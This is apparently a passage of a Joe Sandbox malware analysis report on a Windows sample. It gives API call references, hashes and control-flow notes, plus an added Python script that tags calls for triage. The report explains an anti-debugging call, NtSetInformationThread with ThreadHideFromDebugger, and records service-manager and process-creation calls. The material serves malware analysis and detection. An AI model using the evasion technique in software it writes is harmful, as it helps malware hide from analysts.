                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                        • Instruction ID: 59afb264bfff17e612940b26b4fe49ec36c2c88d8e36a3867b4838c4ff3531be
                                        • Opcode Fuzzy Hash: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                        • Instruction Fuzzy Hash: 2A32C433245B018FC334CF28C890695BBE3EFD5314B698A6DC0EA5B666D779B44ACB50

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                        • Instruction ID: ab7aa1011ceff4506394b6351b08b95281a1150b487f92f5837ad1ba442abbc5
                                        • Opcode Fuzzy Hash: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                        • Instruction Fuzzy Hash: 6E51C1335447018FD3308F28C4807D5BBE3BF95314F698A6DC0E65B6A6DB79B44A8B51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                        • Instruction ID: 4014eebf325d4c710564b06a9eb85b1691d66c16e54d0f856b44d81acc025282
                                        • Opcode Fuzzy Hash: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                        • Instruction Fuzzy Hash: 5951B333504B118FD330CF28C480795BBE3BF95314F658A6DC0E65B6A6DB79B44A8B51
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                        • Instruction ID: 3d4dd3b0884c6f20aa22afd36e391670539d840ef3cbbec3cfa830bccfd9e0c1
                                        • Opcode Fuzzy Hash: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                        • Instruction Fuzzy Hash: D531E133649B01CBD730CF28C8847C6BBA3AF96314F154A6DC0A65B6A2DB7974099B51
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                        • Instruction ID: 6bf8a384f14df3466f3807ac1f142a21085414fd86bf4a892959dfca9bb1b73a
                                        • Opcode Fuzzy Hash: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                        • Instruction Fuzzy Hash: 1631EF33108B01CBD734CF28C490796BBB6AF96304F254A6DC0EA5B2A6DB7974498B51
                                        APIs
                                        • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0C5130
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ManagerOpen
                                        • String ID:
                                        • API String ID: 1889721586-0
                                        • Opcode ID: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                        • Instruction ID: 276ea8ff09ed4d7a2cbefdec9af00a980189ad76ce56daa0fd2b30805fda045c
                                        • Opcode Fuzzy Hash: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                        • Instruction Fuzzy Hash: E0312AB8608351EFC7108F28C548B0EBBF0EB89B54F51895EF988C6360C371C945AB53
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                        • Instruction ID: d789932a80e930c41b5f1d077c321694e39bd6cc2d605965f7ee55d8831fde09
                                        • Opcode Fuzzy Hash: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                        • Instruction Fuzzy Hash: 6321F733118701CBD734CF28C890796BFB6AF86304F144A2DD0A6572A2DF7974048B51
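The two NtSetInformationThread entries above pass 0x11 as the ThreadInformationClass argument; that value is ThreadHideFromDebugger. Once it is set on a thread, the thread stops delivering debug events (exceptions, single steps) to an attached debugger, and it cannot be cleared again; a debugger can confirm the state with NtQueryInformationThread using the same class. The OpenSCManagerA entry passes 0x00000001 as dwDesiredAccess, which is SC_MANAGER_CONNECT. The block below is an added example and is not part of the Joe Sandbox report: it parses API reference lines in the format used throughout this listing (the sample lines are copied from entries on this page) and tags the triage-relevant calls, separating them from the C runtime plumbing (GetLastError, __dosmaperr, ReadFile, WriteFile and similar) that the report lists for every CRT function. The tag names, the runtime-noise list and the functions triage, classify and summarize are this example's own choices.

```python
"""Tag API references from a Joe Sandbox function listing (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from entries in this report.
SAMPLE_API_LINES = """\
• GetCurrentThread.KERNEL32 ref: 6BF43E9D
• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
• OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0C5130
• FindFirstFileA.KERNEL32(?,?), ref: 6C0BAEDC
• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C09ABA7
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4180
• __dosmaperr.LIBCMT ref: 6C0E4187
• Part of subcall function 6C0E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
"""

# One report line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (arg,arg,...) where each arg is hex or '?', then "ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

THREAD_HIDE_FROM_DEBUGGER = 0x11  # THREADINFOCLASS value (ntddk.h)

# dwDesiredAccess bits for OpenSCManager (winsvc.h)
SC_MANAGER_ACCESS = {
    0x0001: "SC_MANAGER_CONNECT",
    0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE",
    0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS",
    0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}

# CRT / plain I/O plumbing to push to the bottom of a triage list (this example's list).
RUNTIME_NOISE = {
    "GetLastError", "__dosmaperr", "ReadFile", "WriteFile", "GetFileType",
    "CloseHandle", "GetConsoleMode", "ReadConsoleW", "GetConsoleCP",
}


@dataclass
class Finding:
    name: str
    module: str
    ref: str
    args: list          # int for a hex value, None for '?'
    tag: str
    subcall_of: Optional[str] = None


def _parse_args(raw):
    if raw is None or raw.strip() == "":
        return []
    return [None if a.strip() == "?" else int(a.strip(), 16) for a in raw.split(",")]


def _decode_access(mask, table):
    names = [n for bit, n in table.items() if mask & bit]
    return "|".join(names) if names else f"0x{mask:x}"


def classify(name, module, args):
    """Map one call (with its recorded arguments) to a triage tag."""
    if name == "NtSetInformationThread" and len(args) > 1 and args[1] == THREAD_HIDE_FROM_DEBUGGER:
        return "anti-debug:ThreadHideFromDebugger"
    if name in ("OpenSCManagerA", "OpenSCManagerW"):
        access = args[2] if len(args) > 2 else None
        return "scm-open:" + (_decode_access(access, SC_MANAGER_ACCESS) if access is not None else "?")
    if name in ("CreateProcessA", "CreateProcessW"):
        return "process-create"
    if module == "LIBCMT" or name in RUNTIME_NOISE:
        return "runtime-noise"
    return "unclassified"


def triage(text):
    """Parse every API reference line in `text` into a tagged Finding."""
    findings = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers, memory-dump lines, etc.
        args = _parse_args(m.group("args"))
        findings.append(Finding(
            name=m.group("name"), module=m.group("module"), ref=m.group("ref"),
            args=args, tag=classify(m.group("name"), m.group("module"), args),
            subcall_of=m.group("sub"),
        ))
    return findings


def summarize(findings):
    """Count findings per tag."""
    counts = {}
    for f in findings:
        counts[f.tag] = counts.get(f.tag, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_API_LINES):
        if f.tag != "runtime-noise":
            print(f"{f.ref}  {f.name}.{f.module}  ->  {f.tag}")
```

Run against the whole exported listing, the noise filter leaves the handful of calls that matter for this sample: the hidden-thread anti-debug call, the service control manager connection, and the process creation. Arguments shown as '?' in the report were not recoverable by the sandbox and are kept as None rather than guessed.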
                                        APIs
                                        • FindFirstFileA.KERNEL32(?,?), ref: 6C0BAEDC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                        • Instruction ID: 5c7a427db91109efa55fe9784d8214cf71f6c3ed6644c7bdace0f213e6d74acc
                                        • Opcode Fuzzy Hash: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                        • Instruction Fuzzy Hash: A51166B0408362AFD710CB68D44469EBBE4BF86314F248E59F0A8DB690D335CC848B26
                                        APIs
                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C09ABA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                        • API String ID: 2738559852-1563143607
                                        • Opcode ID: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                        • Instruction ID: 4fcb24f697c6b72885c7ef9fcf67624e9ca5f60716de709afc124eb71c058960
                                        • Opcode Fuzzy Hash: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                        • Instruction Fuzzy Hash: A6624770A0D3818FC724CF18C490B5EBBE2ABDA314F24991EE9A9CB751D734D945AB43

                                         Control-flow Graph
                                         • Rendered graph not preserved; recoverable from the graph data: entry block 6c0dcad3, API-calling blocks at 6c0dcd57 (GetConsoleMode), 6c0dcd6e (ReadConsoleW), 6c0dcd8a (GetLastError), 6c0dcdb8 (ReadFile) and 6c0dce2c (GetLastError).
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                        • Instruction ID: 9e23766200c2eddb9da858e99af33fecd5a3cc8727d7228e74a469e9ae89f459
                                        • Opcode Fuzzy Hash: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                        • Instruction Fuzzy Hash: 17C1C170A04349AFDF01DFA8C880BADBBF5AF4A318F624159E810AB781C775B945CF61

                                         Control-flow Graph
                                         • Rendered graph not preserved; recoverable from the graph data: entry block 6c0e406c (calls 6c0e44ec), API-calling blocks at 6c0e4167 (GetLastError), 6c0e4192 (GetFileType), 6c0e419d (GetLastError, CloseHandle), 6c0e4310 (CloseHandle, then 6c0e4457) and 6c0e4345 (GetLastError).
                                        APIs
                                          • Part of subcall function 6C0E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4180
                                        • __dosmaperr.LIBCMT ref: 6C0E4187
                                        • GetFileType.KERNEL32(00000000), ref: 6C0E4193
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E419D
                                        • __dosmaperr.LIBCMT ref: 6C0E41A6
                                        • CloseHandle.KERNEL32(00000000), ref: 6C0E41C6
                                        • CloseHandle.KERNEL32(6C0DB0D0), ref: 6C0E4313
                                        • GetLastError.KERNEL32 ref: 6C0E4345
                                        • __dosmaperr.LIBCMT ref: 6C0E434C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: 8Q
                                        • API String ID: 4237864984-4022487301
                                        • Opcode ID: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                        • Instruction ID: 8afdc2ddee86b38afdf8e44a6b0db1599d3271820675e7391979958d4474ca53
                                        • Opcode Fuzzy Hash: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                        • Instruction Fuzzy Hash: 34A13732A44144AFCF098FE8C8517AE7BF1EB4A328F18425DE811EB781CB359906DB52

                                         Control-flow Graph
                                         • Rendered graph not preserved; recoverable from the graph data: entry block 6c09c1e0 (calls 6c0c6b70), WriteFile at 6c09c372, 6c09c3e9 and 6c09c431, ReadFile at 6c09c452 (after 6c0cb920), loop back through 6c09c489 (calls 6c0cb3a0).
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :uW$;uW$;uW$> 4!$> 4!
                                        • API String ID: 0-4100612575
                                        • Opcode ID: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                        • Instruction ID: 0f0072b5db2f6e650b3c52e0f36c91d2ab546b208418a8b5cae8184dd50a2cea
                                        • Opcode Fuzzy Hash: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                        • Instruction Fuzzy Hash: B9718BB0608345AFD710DF54C880B6ABBF4FF8A708F50592EF598D6650D375D888AB93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K?Jo$K?Jo$`Rlx$7eO
                                        • API String ID: 0-174837320
                                        • Opcode ID: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                        • Instruction ID: 184e1737b15399ce202cecced1161912909be6ba25ad0c9d90241cfaff4b316e
                                        • Opcode Fuzzy Hash: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                        • Instruction Fuzzy Hash: B34257B46093428FC764CF18C090B2EBBE1AFC9324F24AE1EE5A587B60D634D945DB53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;T55
                                        • API String ID: 0-2572755013
                                        • Opcode ID: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                        • Instruction ID: 13b00e5229b5c323a3f6e191573bb66299600866ea993f79ee8d5cd41a8ea94f
                                        • Opcode Fuzzy Hash: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                        • Instruction Fuzzy Hash: D703E633644B018FC728CF28C8D0695B7E3EFD53247198AADC4E64B6A5DB78B54ACB50

                                         Control-flow Graph
                                         • Rendered graph not preserved; recoverable from the graph data: entry block 6c0c4ff0 calls CreateProcessA; block 6c0c5080 calls WaitForSingleObject and then CloseHandle twice (the wait-then-close-both-handles pattern of a synchronous child run).
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                         • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID: D
                                        • API String ID: 963392458-2746444292
                                        • Opcode ID: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                        • Instruction ID: f3485eeb0170fdabbf81bf86da3f3bb234bab1787c6a3de5d1c2a6a1a58bc4ab
                                        • Opcode Fuzzy Hash: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
